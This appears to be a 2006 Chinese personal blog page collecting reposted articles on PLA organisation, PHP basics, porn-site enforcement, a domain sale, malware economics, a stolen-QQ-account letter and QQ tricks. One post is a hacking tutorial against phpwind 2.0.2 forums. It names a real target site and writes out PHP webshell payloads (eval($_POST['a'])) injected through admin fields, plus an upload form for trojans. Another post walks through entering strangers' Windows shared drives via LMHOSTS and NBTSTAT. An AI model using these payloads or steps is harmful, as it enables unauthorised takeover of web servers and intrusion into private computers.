博主资料

留言短消息 加为好友 收藏

用户ID:  445972
昵称:  plaodj
来自:  湖南 长沙
年龄:  22
爱好: 焦点访谈

欢迎您的到来!

劲哥哥诚挚的欢迎您的到来!

日历

2006 - 9
     12
3456789
10111213141516
17181920212223
24252627282930
«» 2006 - 9 «»

日志分类

个人统计

用户名: plaodj
等级: 四星会员
威望: 430
金钱: 12135
在线时间: 417 小时
日志总数: 2337
评论数量: 663
访问次数: 11083054
建立时间: 2005-09-10
RSS订阅       手机访问

日志文章列表

2006年09月29日 23:36:46

PLA Navy

The People’s Liberation Army Navy (PLAN) consists of five main service arms: surface combatant, submarine, naval air force, marine corps, and costal defence forces. Navy troops are grouped into three major fleets: North Sea, East Sea, and South Sea, which are strategically located to the north in Qingdao, to the east in Ningbo, and to the south in Zhanjiang respectively, providing the PLAN with direct access the Yellow Sea, Taiwan Strait, and South China Sea. The naval air force (PLANAF) provides air cover for the surface ships and submarines. The marine corps and costal defence forces are stationed in along China’s coastline to protect the mainland and offshore islands.

Historically, the PLAN’s chain-of-command was organised into four administrative and operational levels: PLAN Headquarters, fleet headquarters, navy base headquarters, and operational units. Following the PLA’s 2003 force reduction and restructure programme, navy base headquarters ceased to function as a level of administrative and operational commands, leaving the navy with a three-level organisational structure: PLAN headquarter, fleet, and operational units. However, Huludao Navy Base was retained as the PLAN’s only remaining navy base to command the nuclear submarine force.

The PLAN is headed by an Admiral, who is assisted by a number of deputy commanders, a political commissar, and several deputy political commissars. Headquarters staffs, led by the Navy Chief of Staff, provide oversight and direction through the headquarters’ four major departments: command, political, logistic, and equipment. This structure mirrors the organisation of the PLA’s four general departments (general staff, general political, general logistic and general armament). The navy is capable of fighting independently, or as a part of a joint operation that involves other services.

Each of the PLAN’s three major fleets and consists of a number of surface ship and submarine units, a naval air force arm, and costal defence districts. A navy fleet is commanded by a Rear Admiral, who also serves as the deputy commander of the military region (MR) in which the fleet is headquartered. Each fleet has a number of major and minor bases, airfields, logistic support and maintenance facilities, with its area of responsibility covering a major part of China’s offshore territory. The three fleets can operate separately, or provide mutual support to each other.

During an operation, surface ships and submarines from one or more fleets can be organised into task forces or groups of various sizes according to the requirements of the mission. While in peacetime navy ships are grouped into flotillas of a specific ship category for maintenance and training purposes. Each flotilla is led by a Senior Captain, and consists of two or three ship groups. A fleet normally has two surface combatant flotillas, a conventional submarine flotilla, a fast attack craft flotilla and a support ship flotilla. The North Sea Fleet also has a nuclear submarine flotilla, and the East and South Sea Fleet each has a landing ship flotilla.

The PLA Naval Air Force (PLANAF) is organised into aviation divisions and independent regiments, which are subordinated to the three PLAN fleets. Each division and regiment operates a number of aircraft for air interception, close air support, maritime strike, reconnaissance, and transport purposes. The PLANAF uses a similar organisational structure to that of the PLA Air Force (PLAAF), with divisions, regiments, groups, and squadrons. Each fleet has one or two fighter divisions, a bomber division, and one or two independent special mission regiments. Each fleet also has a shipborne helicopter regiment with its helicopters assigned to a specific surface ship.

The marine corps includes a marine brigade stationed at Zhanjiang, Guangdong. It is similar to an Army field brigade in organisational structure. The coastal defence forces that operate land-based anti-ship missile launchers, anti-aircraft artillery (AAA) and surface-to-air missile (SAM) systems are normally grouped into regiment and battalions.
类别: 无分类 |  评论(0) |  浏览(7807) |  收藏
2006年09月29日 23:33:01

PLA ground forces

The present structure of the PLA ground forces reflects its operational concept of fighting a local war under hi-tech conditions. The PLA continues its force reduction that began in the mid-1980s, and the ground forces have absorbed the bulk of these reductions. The total number of the PLA ground forces was reduced from 2.2 million in 1996 to the current 1.6 million, which accounts for 70% of the PLA’s total strength. At the same time, the ground forces have undergone the most significant reorganisation and restructuring in over a decade.

The PLA ground forces are generally organised into a three-tiered structure: main forces, local or regional forces, and reserve forces and militia. The main forces are mainly composed of 18 group armies stationed across the country. They are intended to be available whenever necessary for operations anywhere in China. The local forces consists of active and reserve PLA units as well as the People’s Armed Police (PAP) units, which had a secondary mission of local defence against external enemies. They are responsible for defence of areas where they are stationed and also shares responsibility for the internal security. The militia units would provide combat and logistic support to main and local forces in local defence.

The main ground forces mainly consists of eight service arms, including infantry, artillery, armour, army aviation, air defence missile, engineering, communications, chemical defence troops, as well as other specialised units such as medical, electronic countermeasures (ECM), reconnaissance and mapping. These troops are grouped into combined-arms group armies, each with three to four combined-arms division or brigades, and a number of combat support and combat service support units and subunits. The PLA ground forces currently have 7 armoured divisions, 34 infantry divisions, 11 armoured brigades, 27 infantry brigade, 18 artillery divisions/brigades, 18 air defence brigades, 12 army aviation regiments/groups, 1 anti-tank brigade, and 1 tactical surface-to-surface missile brigade.

PLA ground forces are also categorised according to their readiness and manning levels. Class-A units are at or near full manpower (over 80% of personnel and equipment) and capable of deploying without significant argumentation and training. Class-B units are maintained at 60~80% manning level, lack some organic units, and require more training and more time to deploy than Class-A units. Previously there were also Class-C units, most of which were disbanded, became reserve units or taken over by PAP. This classification mainly applies to divisions and brigades. Sometimes entire group armies may also be categorised as Class-A or –B, though the difference between two class of GAs are much less evident.

Command and control for the PLA ground forces originate from the Central Military Commission (CMC), pass through the General Staff Department (GSD), and is exercised through a series of regional and operational headquarters including military regions, provincial military districts, garrison districts, military sub-districts, and local people’s armed forces departments. The highest regional administrative and operational headquarters is military regions (MR). Each MR covers several provinces according to their geographical locations and is responsible for army, air and naval forces stationed in these provinces. China is divided into seven MRS: Beijing, Shenyang, Lanzhou, Jinan, Nanjing, Guangzhou, and Chengdu.

Each MR is commanded by a General or Lieutenant General, who is assisted by a number of deputy commanders, including the MRAF commander and the fleet commander (if naval forces are presented within the MR); a political commissar, and a number of deputy political commissars. The organisations of a MR mirrors the PLA’s four general departments, but in smaller sizes. Each MR has a headquarters, political department, joint logistic department, and equipment department. MR staffs are overseen by an MR Chief of Staff. MR ground forces consists of group armies, independent units (divisions, brigades, regiments, groups) that are directly controlled by the MR, province military districts, garrison districts, and local and reserve units under the command of provincial military districts/garrisons assigned to the MR.

Under normal circumstances, the movement of any but the smallest military units for operational purposes must be originated in the GSD at the direction of the CMC. In time of emergency, a temporary operational command headquarters known as Theatres of War would be formed to conduct joint operations involving two or more services. This ad hoc wartime headquarters would be formed around the structure of an MR headquarters, but could involve units from other MRs in response to the specific situation, and could be commanded by officers from higher headquarters.

Provincial military districts are responsible for local and reserve units stationed in their provinces or autonomous regions and for mobilisation preparations. Provincial military districts are commanded by a Major General, who coordinate closely with local government leaders and PAP forces in their areas. Military sub-districts and their organic People’s Armed Force Departments are responsible for formulating mobilisation plans, organising conscription, providing material supports, directing local and reserve and militia training, and work closely with local government and Communist Party officials in liasing between military and soldier families, supporting demobilised soldiers, and conducting military educations in local schools.
类别: 无分类 |  评论(0) |  浏览(7949) |  收藏
2006年09月29日 22:59:19

PHP 语法

PHP 基本语法看起来很熟悉。



<?php

echo "Hello, World!";

?>

运行结果:

Hello, World!

变量标记为“$”。你也可以将上面的“Hello, World!”写为如下代码:

<?php

$message = "Hello, World!";

echo $message;

?>

字符串的串联则是用“.”(一个英文句点)标示出来;其他有关数字的运算符号则如同你所预期的一样:

<?php

$greeting = "Hello ";

$num = 3 + 2;

$num++;

echo "$greeting $num people!";

?>

运行结果:

Hello 6 people!

PHP 有完整的运算符,其功能同你所预期的一样——特别是当你有C或者C++的知识背景时的时候。使用PHP一条很好的经验法则是:“遇到问题,先试试看,很可能成功。”

正如在Perl一样,一个字符串用双引号括起来,这将使得其中的变量被值置换,而如果以单引号括起来,则不会。因此,如下代码:

<?php

$name = 'Susannah';

$greeting_1 = "Hello, $name!";

$greeting_2 = 'Hello, $name!';

echo "$greeting_1\n";

echo "$greeting_2\n";

?>

运行结果:

Hello, Susannah!

Hello, $name!

注意字串中“\n ”是换行符号,就跟在Perl或C一样。不过这仅在以双引号括起来的字符串内才有效。

变量

PHP 可以把环境变量当作一般变量使用。这包括由服务器为一段CGI 程序所设定的环境变量(即使当你以模块方式执行PHP)。因此,如果页面http://www.domain.com/farm/cattle/cow-cow.cow.html包括以下代码:

<?php

echo "[$REQUEST_URI]";

?>

它将输出[/farm/cattle/cow-cow-cow.html]

数组
使用方括弧([ and ])设置数组索引(一般或关联性):



$fruit[0] = 'banana';

$fruit[1] = 'papaya';

$favorites['animal'] = 'turtle';

$favorites['monster'] = 'cookie';

如果你对数组赋值,但索引是空白的,PHP则会把对象放于数组末尾。上面对变量$fruit的声明同下面代码的结果是一样的:

$fruit[] = 'banana';

$fruit[] = 'papaya';

你也可以用多维数组:

$people['David']['shirt'] = 'blue';

$people['David']['car'] = 'minivan';

$people['Adam']['shirt'] = 'white';

$people['Adam']['car'] = 'sedan';

一个创建数组的简便方法是

array()

函数为:

$fruit = array('banana','papaya');

$favorites = array('animal' => 'turtle',

'monster' => 'cookie);

或者

$people = array ('David' => array('shirt' => 'blue',

'car' => 'minivan'),

'Adam' => array('shirt' => 'white',

'car' => 'sedan'));

内建函数count()表明一个数组里有多少元素:

$fruit = array('banana','papaya');

print count($fruit);

得到如下结果

2


控制结构
你可以利用循环结构例如for以及while:



for ($i = 4; $i < 8; $i++) {

print "I have eaten $i bagels today.\n"; }

结果

I have eaten 4 bagels today.

I have eaten 5 bagels today.

I have eaten 6 bagels today.

I have eaten 7 bagels today.

同样可写为

$i = 4; while ($i < 8) {

print "I have eaten $i bagels today.\n";

$i++;

}

你可以使用控制结构if以及elseif:

if ($user_count > 200) {

print "The site is busy right now!";

} elseif ($user_count > 100) {

print "The site is sort of active right now!";

else {

print "The site is lonely - only $user_count user logged on.";

}

使用运算符的经验法则同样也可以运用在控制结构上面。你还可以使用switch,do...while,甚至是 ?: 结构。

类别: 无分类 |  评论(0) |  浏览(11980) |  收藏
2006年09月29日 21:54:54

“情色六月天”死而复活!黄站为何打不死?

我们的“揭密网络黄链”系列报道刊登后,有知情网友向我们报来了一条令人惊讶的消息:“情色六月天”又重新运作了!当这起被称为国内最大的网络色情案刚刚告破,其老板陈辉、论坛管理员付秋等9名犯罪嫌疑人尚未被宣判的时候,这一跨境色情网站又开始运作,无疑是一种挑衅。

  在国内最大的搜索引擎上搜索,我们很容易就能找到这个重新运作的“情色六月天”地址,而且令人惊讶的是,搜索结果竟然排在非常靠前的位置。在论坛显眼的地方,张贴着论坛招收精英会员重组版主队伍的公告,要求申请者“每周至少有3天每天3小时以上可以上六月发贴和管理,并有丰富的成人资源”,在跟帖者中不乏宣称自己是“老用户”的人申请加入其中。同时,该论坛的收费会员注册还依旧在进行中,宣称只需缴纳500元人民币成为钻石VIP会员,就可以享受数百个色情网站的破解密码,缴纳300元成为黄金VIP会员,可以进入除钻石密码区以外的任何VIP区。在缴费教程里面,不但提供了开通各大银行在线支付的详细教程,还有教授用“支付宝”支付的详细流程。一个陈辉被捉了,另一个“陈辉”又再继续用便捷的网络支付手段敛财。

  无独有偶,网易科技发现05年震动一时的网络色情第一大案“九九情色论坛案”中宣告覆灭的“九九情色论坛”,现在依然运作如常!在这起监管部门侦破的第一宗跨境网络色情案中,被认为是幕后大老板的“戏子”当时并没有落网,而是潜逃到了美国境内。同样在搜索引擎上,我们很容易就找到了“九九情色论坛”的地址。进入论坛,发现目前已经关闭了用户注册,显示在此之前该论坛已经运作了很长一段时间,累计了大量的注册用户,已经发展到比较成熟的程度了,在会员统计中显示注册用户会员数已经超过了37000名。而为了保证会员能正常访问论坛,该论坛公布了多达5个不同的IP地址,并且全部IP地址归属地都是在美国。

  “情色六月天”为何能死而复活?“九九情色论坛”为何能屡打不死?有熟悉色情网站运作的人士告诉网易科技,这些跨境的色情网站服务器都存在国外,国内执法部门能够封掉的充其量只是从国内指向国外服务器的出口,国外服务器上存储的网站数据根本无法删除,只要能够获得这些海外服务器的控制使用权,网站又可以重新运作了。

  而为了逃避国内网络监管部门的封杀,这些色情网站都会频繁地变换IP地址和域名,但为了在变化IP地址和域名后用户能够找到论坛的入口,通常这些网站都会利用第三方合法的网站发布论坛的最新登录地址。微软的个人空间Space往往成为跨国色情网站发布地址的理想场所,色情网站管理人通常会在微软Space上开设“论坛地址发布页”,每次变化登录地址时就更新一下微软Space,并建议注册会员把该“论坛地址发布页”收藏至收藏夹。而对于国内的色情网站,也有部分选择用QQ来发布登录地址的,只需要把登录的地址写在QQ用户信息一栏,并把QQ号码对外公布出去,注册会员一查询该号码的资料就能获得论坛的登录地址。在国内这种用QQ发布登录地址的方式对比用微软Space发布更具有隐蔽性,而且传播的范围更广。

  除此以外,一位熟悉熟悉搜索引擎广告销售的人士透露,国内的大型色情网站甚至会跟搜索引擎签订合作协议,要求在搜索结果中出现论坛的地址。据了解,搜索网站会按照色情网站营业额的20%到30%不等进行提成。“规范的搜索引擎可能未必冒风险与色情网站合作,但不少搜索代理为了业务利润也会不惜铤而走险,”该人士透露,“搜索结果可能未必直接指向论坛的直接登录地址,有可能是一个刊登了色情论坛地址的合法网站,这样做即使东窗事发,搜索引擎网站也有开脱的理由。有时候直接从搜索结果点击并不能进入论坛地址的发布页面,但通过‘页面快照’的功能,网民依然可以获取论坛的地址”。

  色情网站为了逃避监管可谓无所不用其极,而对于监管部门而言,飞速发展的互联网也让其措手不及,山西省警方破获“情色六月天案”时,就陷入了网络取证难、监管人手严重不足、量刑无合适法律可依的尴尬局面。正是利用这些空子,色情网站和监管部门玩起了“猫捉老鼠”的游戏。

  庞大的利润收益永远是色情网站的第一推动力,明天我们看看色情网站是怎样赚钱的
类别: 无分类 |  评论(5) |  浏览(35458) |  收藏
2006年09月29日 21:53:25

珠峰新高度域名8844.com卖出7位数高价

9月28日电 日前,珠峰新高度8844的顶级域名8844.com,卖出了高达7位数的高价,创下了中国内地域名买卖的最高价记录。购买者是创造中国第一家电子商务网站8848的连邦软件。

  在中国互联网大会的展会上,连邦总裁王建华告诉记者,买到这个域名还真费了不少周折。由于对珠峰新高度域名志在必得,在国家重测的珠峰高度发布之前,连邦一口气注册了8845~8855的几乎所有相关域名,偏偏没有注册8844,因为各种信息显示新高度大于8848的可能性大。当国务院新闻办宣布8844这个数字时,连邦所有高层都惊呆了,然后迅速去抢注该域名,但为时已晚。连邦立即着手调查,几天内查到8844.com被江苏徐州的一位无业人员抢注。等联系上他时,得知域名在珠峰新高度发布后第二天就被另外一位江苏人以20万元买走。之后顺藤摸瓜,找到域名持有人时,该域名已经是三易其手,价格也抬得很高了。连邦经过多次协商,最终才以7位数的价格把它拿下。

  谈到为什么要花如此高的价格收购该域名时,王建华颇为激动。他说,这个域名在连邦人眼里是无价的,就是一个亿也值。

类别: 无分类 |  评论(5) |  浏览(12321) |  收藏
2006年09月29日 21:51:32

病毒作者为盈利 刻意放慢病毒传播速度

9月26日外电消息,过去,病毒作者编写恶意程序都是为了追求名声和受到受到关注。他们尽可能地让这种恶意程序尽快地和广泛地传播,并且向同事吹嘘自己在几个小时之内瘫痪了全球的几十万台计算机。

  但是,许多病毒作者编写病毒都是被金钱驱使的。他们编写代码把疏于防范的个人的计算机变成僵尸网络的一部分,以便用于传播垃圾邮件或者窃取其他人的金融信息。

  安全专家称,有些病毒作者甚至采取措施保证他们的恶意程序不要传播的太快或者传播的范围太广,以避免这些恶意程序被人发现和封锁。

  赛门铁克安全反应小组的高级经理Alfred Huger说,如果这些恶意程序能够积极活动更长的时间,他们就能赚到更多的钱。

  Huger说,不太久以前,一个人在恶意软件的帮助下一次能够控制多达40万台的计算机。现在,恶意软件控制的计算机数量平均为1000台,这就使网络很难跟踪和封锁这种恶意软件。

  Huger说,垃圾邮件制造者一直在编辑针对具体地区的电子邮件列表,把目标对准为一个特定地区服务的单个的互联网服务提供商或者把一个城市的电子邮件列表编辑在一起。发给这些列表中的地址的电子邮件信息可能是进行诈骗的或者传播用于偷窃数据的恶意程序的。

  Huger表示,病毒作者还聪明地利用有安全漏洞的网站传播恶意软件。当有足够数量的用户被恶意软件感染之后,他们就撤销这个恶意软件,然后在以后再恢复使用这个恶意软件。

  这些恶意软件作者对于恶意软件的传播是非常细心的。许多新的病毒主要都是通过社会工程学传播的,就是欺骗用户打开貌似合法的电子邮件附件。

  虽然病毒作者长期以来一直使用这种技术,但是,许多病毒作者一直在努力克服需要用户参与而引起的延迟传播的问题。他们利用系统安全漏洞来自动传播他们的恶意程序。


the txt came from www.chinahacker.com very good!
类别: 无分类 |  评论(0) |  浏览(10796) |  收藏
2006年09月29日 08:55:59

phpwind漏洞利用终结篇

这漏洞出了也有段时间了..开始在Q里..三少哥哥先发了漏洞利用工具给我..然后自己试着传上了PHP马..然后枫三少又告诉我一种方法...拿下了不少站...当晚准备把文章赶写出来..太困了就没继续写...这几天家里发生的事太多..一直也没时间写...最近网上也出了文章和教程,我看了下都不是很完整..今天我就来做个完结篇的..算是庆祝我升黑基管理员把....
首先在baidu或google搜索
Powered by PHPWind v2.0.2 或
Powered by PHPWind v2.0.2, PLUS V2.1
为了不耽误大家时间..我提前找了一个
http://www.arebbs.com/先注册一个...注册过程我想大家都会的把..。我已经注册好了..登陆.
然后用玄猫写的phpwind提升漏洞测试程序提权.
提示失败..但也不要灰心...我们来看下..看..多出了一个"系统设置 "
我在测试的时候.发现好几个站都是这样,.但结果都是成功的...下面我们继续拿webshell
将介绍三种方法给大家
请将此文件(template/baobao/header.htm)属性设置为 777 可写模式
汗了...好象管理员发现了..把这个设置了不可写...
大家可以找别的站试下...把方法说下
方法一.
进入后台,找到“风格模板设置”
在原有的代码前面加入以下代码:
<style type='text/css'>
</style>
<!--
EOT;
?>-->
<?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>
<!--
<?php
print <<<EOT
-->
保存后,木马地址为当前目录下的faq.php
在本机用如下表单进行提交:
<form ENCTYPE="multipart/form-data" ACTION="http://目标服务器/faq.php"
METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
上传成功后的木马存在论坛目录下
直接访问就行!
\\
假设现在的这个是可以的...
这个是我以前搞的..我试下还能用不..看样是不行了..大家只要把这里换一下..然后就可以本地上传任意文件了..前提是次目录是可写的...如果不可写..我们还可以利用第二种方法..

方法二.
首先用EXP进入后台,在后台里执行如下过程:
新增 不良词语写a']='aa';eval($_POST['a']);// 替换为那里可以写随便写..我这里替换了11
而后得到一个shell地址为 http://www.arebbs.com/data/bbscache/wordsfb.php
写如成功后wordsfb.php文件的代码就成了
<?php
$wordsfb['a']='aa';eval($_POST['a']);//']='1';
?>
然后用lanker微型PHP后门客户2.0正式版.htm上传一个新PHP马...密码是a
这样我们就得到webshell了...
本程序目录..我们来传个马看下.hb.php是angel写的PHP马...出现OK就是上传成功...我们访问下看看
http://www.arebbs.com/data/bbscache/hb.php
密码www.ciker.org登陆/....就这么简单...:)
下面还有一个方法是在网上看到的..也介绍下把..
方法三.
用户等级管理
然后新建立会员组
头衔你可以随便写,但是千万不要写单双引号特殊符号,升级图片号写a';eval($_POST['a']);//
升级点数依然可以随意写。
而后得到一个shell地址为
http://localhost/bbs/data/bbscache/level.php
密码是a lanker的一句话后门。
接下来的就跟方法二要做的一样了..
我们试下有没成功.密码同样是a
晕...
难道被发现了?
估计是封了我IP
webshell可以访问...看样是把我IP封了..刚才试的时候...出了错误..
感觉是
升级图片号写a';eval($_POST['a']);//
这句问题.如果大家在测试时候也出现和我同样的错误
把a';eval($_POST['a']);//这个改为
a']='aa';eval($_POST['a']);//...我就不费时间去找别的站测试了...如果大家有好的发现欢迎与我交流
我的BLOG:http://www.ciker.org/
教程中所用工具以全部打包...希望大家不要利用此漏洞去恶意攻击..建设比破坏更美好..

类别: 无分类 |  评论(0) |  浏览(10919) |  收藏
2006年09月29日 08:31:34

简单的入侵他人系统

首先声明:本文写作目的在于介绍有关网络安全的一些知识,以提高读者对网络安全的重视,如果有人使用或模仿本文中的方法对他人造成损害,是触犯法律与违反道德的行为。一切严重后果应由肇事者负责。

本人对各类操作系统比较熟悉,尤其迷恋于局域网。偶然的机会发现了一种Win9X的比较简单却很有效的入侵方法,是广大用户应该防备的。在继续往下看之前呢,您应首先具备以下知识:

1、理解IP地址的含义。

2、理解动态IP地址与静态IP。

3、知道局域网资源共享的方法及如何配置。

4、有一定的DOS基础和基本的上网知识。

如果你具备了以上几条,那么你可以跳过下段继续阅读;如果你对以上知识不是很清楚的话,请看快速入门。

快速入门:IP地址是一个32位二进制数,分为4个8位字节,是在使用TCP/IP协议的网络中用于识别计算机和网络设备的惟一标识。也就是说IP地址必须是惟一的----因特网上不能有两台计算机或其他网络设备的IP地址相同。如果两台计算机的IP地址相同,则其中一台计算机将无法在网络中进行通信。

关于动态IP,则是对广大的拨号上网用户而言的,每次上网由ISP自动分配一个IP地址,静态IP则是对于常年连接在网上的计算机而言的,其IP地址是由INTERNIC提供的。IP地址的格式为***.***.***.***,例202.102.224.68就是合法IP地址。

对于局域网的共享设置则相对较为容易,开始,控制面板,网络,选中文件及打印共享。

系统配置:

第一步 查找文件LMHOSTS.SAM

命令 DIR LMHOSTS.SAM(基于Windows目录)其中WINNT中目录有所不同请自行更改。

第二步 用EDIT编辑此文件,删除文件内的所有内容。存盘,退出EDIT。

REN LMHOSTS.SAM LMHOSTS 改名

第三步 打开控制面板,网络,设置文件及打印共享。

第四步 保存配置,需要重新启动。

DOS命令培训:

有两个命令PING和NBTSTAT。

PING的命令格式为PING COMPUTERNAME可以得到IP地址,其他用法可以通过PING的命令帮助得到。

NBTSTAT的命令格式为NBTSTAT -A IPADDRESS可以得到电脑名字。

NBTSTAT -R

其他用法及格式请自行参阅帮助。

INTERNET配制:能上互联网就可以,没什么可说的。

初次实践:

第一步 连接到互联网上。

第二步 打开一个DOS窗口(MS-DOS方式)并进行C盘Windows目录。

第三步 PING计算机名称,要看自己的电脑名字可以用控制面板,网络,标识中得到,也可以运行IPCONFIG或者WINIPCFG。

第四步 假设上步中得到IP地址为202.111.134.61

第五步 NBTSTAT -A 202.111.134.61可以得到几行输出结果,其中第一行有电脑的名称。

第六步 更改上面的IP地址为你想入侵或访问的互联网上的某台计算机的IP地址,这样你就可以得到对方电脑的名称。

第七步 编辑文件LMHOSTS用EDIT文件内容为202.111.134.67 HANFENG,设其中202.111.134.67为你要访问互联网上计算机的IP地址,HANFENG为此电脑的名称并存盘退出。

第八步 命令NBTSTAT -R

第九步 点击查找“计算机”输入HANFENG后开始搜寻。如果找到一台计算机,你就成功了!

疑难解答:

问:如果得到IP地址?

答:方法甚多,介绍几种很有效的。

1、OICQ通过OICQ SNIFFER这个工具,你随便给你的朋友说一句话就可以得到对方的IP地址。

2、扫描工具 我使用SUPERSCAN,我认为这个工具功能很强大。运行程序后,在主界面上点击“ME?”就可以得到本机的IP地址然后找到如202.111.107.78,202.111.107.78的字样更改上面的78为1,下面的78为255,点击“start”,这样就把在此区域的内的所有计算机的IP地址都找到了,而且可以查找各计算机所开放的端口,比如提供的FTP,TELNET,HTTP,FINGER等服务。是不是很强大呢?

问:如果与一台电脑长期联系?

答:我只提供一种可能实现的方法:第一次进入别人电脑的时候,看看他是否有OICQ,如果有就复制他的资料,添加为好友,别的就不多说了!



问:为什么找到了计算机之后却什么也看不见?

答:只有一种情况,被你进入的计算机没有设置共享。

问:为什么找不到计算机的名称?

答:可能一些协议没有安装,还有可能是对方设置禁止别人找到计算机的名字,比如天网就可以实现!

问:有没有更简单的方法找到计算机的名称,因为我不太熟悉DOS命令?

答:可以用追捕,其他不变!

问:此方法的原理是什么呢?

答:其实很简单,只要你对tcp/ip协议比较了解并熟悉小型网络,你就很容易明白!

首先,tcp/ip协议被大多的计算机安装,还有netbios服务。再说了,现在是网络的时代,有计算机就有资源共享,有资源共享就有机会进入。说来说去,还是自己惹的祸。

其次,熟悉lan的朋友都知道,查找:计算机,如果你再分析一步,是根据什么查找的呢?我找了一段时间发现有一个文件lmhosts.sam,打开一看就什么都明白了。这里解释一下sam的意思,security accounts manager中文意思是安全性帐户管理器,说白了是一个数据库。你只要扩充这个数据库,添加更多的数据,你就增加了不少系统入口了,这样就可以访问网上的电脑了,是不是很简单呢!

也许大家还知道wan,用这种方法你可以建立一个很大的网络,具体细节不在讨论范围。

最后呢,我认为这不算什么系统侵,只是悄悄和别人联网,你说呢!

问:为什么有的时候找到计算机之后,想打开却要输入网络密码?

答:这是安全机制,设置有访问密码,你只有知道密码才可以访问资源,一般这些资源很不错,有点价值的,哈哈,怎么办呢?自己用用脑筋吧!一会儿我介绍一种比较高深的入侵ip电子欺骗!

问:还有没有好的DOS命令呢?

答:有,只介绍一个net命令关于这个命令大家可以看例子:

net view \\hanfeng

执行结果:

shared resources at \\hanfeng

sharedname type comment

c disk c'mon in and look around

d disk no password requierd

e disk cd - rom

the command was completed successfully

自己看看,可以明白的,理论来自实践!

问:如何才可以熟练掌握这种方法呢?

答:努力学习局域网,既当客户机,又当服务器,很好玩,学的也很快,欢迎大家和我交流。我们共同进步!

问:为什么上次找到的计算机这次找不到了呢?

答:原因估计有两点:

第一:可能主机的名称改变了。

第二:可能主机的IP地址是动态分配的也就是说每次上网的IP地址都不一样!

问:什么是IP电子欺骗?

答:IP电子欺骗是对连接到Internet的任何网络的潜在的危险威胁。在一个网络上,一个主机允许其他“可信任的”主机与其通信而不要求身份验证,该过程通过设置.chost和其他文件完成。

任何来自非可信任的源的通信,在被允许建立通信联接之前,必须提供身份验证。使用IP电子欺骗,一台没有联接到网络上的计算机进行联接并且看起来好像他们是网络中的一台可信任的计算机一样,这是通过改变他们的IP号码为网络中一台主机的号码来实现的。事实上是,入侵主机假冒一个本地系统的IP地址,并欺骗其他主机不要求提示进行身份验证!就这么多!

问:如何避免别人进入自己的电脑?

答:这才是研究安全问题的最终目的,根据经验,最主要的有以下几条:

第一:关闭一切共享,或者设置密码!

第二:电脑的名称改为中文或者中英文结合!

第三:用防火墙比如天网!

例如本文介绍的入侵方法,只要你设置了以上几点,就能够完全防住!
类别: 无分类 |  评论(0) |  浏览(8609) |  收藏
2006年09月29日 08:30:55

一位残疾女孩子写给黑客的信

我不知道怎么联系你,所以只好写封信给你,你会疑问我是谁?找你有什么事?我先请求你把我的信看
完。
我就是那个被你盗了号码,哭了几天的小女孩,放心我这次写信给你不是骂你,也没什么别的什么事,
我只是很伤心,所以就写信给你 让你知道你盗我的号码时 不止是盗了个号码而是我全部的寄托和快乐,
也许你会说你没盗,觉得我莫名其妙,但是我有送你东西的记录,所以我把每个盗我东西的人都发了
只是希望那个正真盗我的人看到我的信,所以请你见谅!。
现在我先自我介绍下 我是个15岁的残疾女孩,一个生活不能自理,一个身体畸形行动不便,一个不知道
能活多久,一个无法拥有正常女孩拥有的一切一切!,对~那个女孩就是我!但我是性格外向比较乐观的
人,所以我并不悲哀~因为有爱我的爷爷奶奶,我最大的愿望就是开心过完我自己的日子,我平时喜欢看
书,后来我奶奶给买了台旧电脑,于是我学会了上网,让我找到现实生活中 我不能拥有的东西和快乐,
我很喜欢玩QQ 这个号码我玩了2年多 它是我的朋友 我的寄托 我的唯一 它对于我不再只是一个号码的
意义了,因为我身体畸形没有女孩子本来应该拥有的美丽,所以我很喜欢QQ绣 看着自己的形象穿着漂亮
的衣服,我很开心~也许是因为我的绣 你才偷我的,以为我的号码有很多油水可捞,怎么?失望了吧
我只有7个QQ币,而且是我上次在论坛做图小活动中得来得,一直没舍得用,衣服到是有很多,你也看到
了全是别人送我的 你偷不了就全部册了 那个衣服是我自己靠帮别人软件做图 做个性签名 头像闪字之类
的图图换来的,是我辛辛苦苦花几小时做图换来的,你偷了我的Q币 为什么还要册我的衣服?对你有好处
么?你册光了我的衣服开心么?你觉得册我这样残疾女孩的东西有意义么?但我知道黑客也是人,也有心
你如果知道我是这样的女孩还会盗我么?还会伤害我么?你有女儿吗?这几天我都不知道哭了 多少次
你也许觉得我太夸张了~~但如果你是我 被盗了回是什么感觉?因为我没有 你现实生活中的一切啊~~~
我只在这个虚拟的世界找到自己的快乐和权利,这样也不可以吗?对了如果你真的喜欢我的号码 再过几
年,我身体越来越差了,可能活不了几年 所以到时你再盗吧~送你都可以~呵呵如果你看了我的信 觉得生
气想再盗我的话 请先加我~我想和你聊聊 可以吗?我说了这么多也没别的什么 更不是想让你同情我,
也许你不相信我,你觉得我有必要编那么多话骗你这个黑客嘛~~你不信的话可以加我 我过几天会拖别人
买个视频的,让你们看看在这个世界角落的女孩,好了不说了886 也不知道你是哥哥还是姐姐~~呵呵


一个残疾女孩留4月5日

类别: 无分类 |  评论(1) |  浏览(11285) |  收藏
2006年09月27日 21:02:34

破解“隐身”的几大绝招[zt]!!!

现在,几乎所有聊天工具都提供了隐身登录的选项,使得你可以在网上自由畅谈的同时躲过老板犀利的质问。但有时这也让我们颇为郁闷,特别像笔者眼见对面的MM运指如飞聊得正欢,而在好友面板却是一个灰头土脸的头像。好在“上有政策,下有对策”,只要精神不滑坡,办法总比困难多。这里介绍几种笔者常用的方法,来挖出那些隐身的网友。

一、时间分析法
适用软件:QQ、Popo、UC

直接发送消息给对方来验证是否隐身,结果完全取决于对方,但如果借聊天工具通讯原理,还可以对时间分析来作为判断是否在线的理由。以QQ为例,当发送消息给不在线用户时,消息内容先暂存于腾讯的服务器上,待对方上线后再将其发送给用户,按信息流程是“你的QQ”→“腾讯服务器”。但如果发送至隐身用户,则流程会是“你的QQ”→“腾讯服务器”→“服务器检测对方是否在线”→“对方的QQ”。

因此,从理论上看,在网络速度敏感的区域,还是有可能通过此法来判断对方是否在线的。

二、自动提示法
适用软件:QQ、Popo、UC

利用聊天工具的自动上线提示,在很多时候也可以用来为我们提供判断对方隐身的依据:一个一上线就将变灰的头像有很大可能是隐身的。不过此法只适用于那些没有默认选择“隐身登录”的用户。以QQ2004为例,方法如下:单击“菜单”→“好友与资料”→“好友管理器”,然后选择需要添加上线提示的好友,确认其“上线提示”选项框处于选中状态。这样,以后如果出现过此好友刚上线,而在面板上头像一闪之后即转为灰色,基本可以判断其隐身了。

三、视频对话
适用软件:QQ

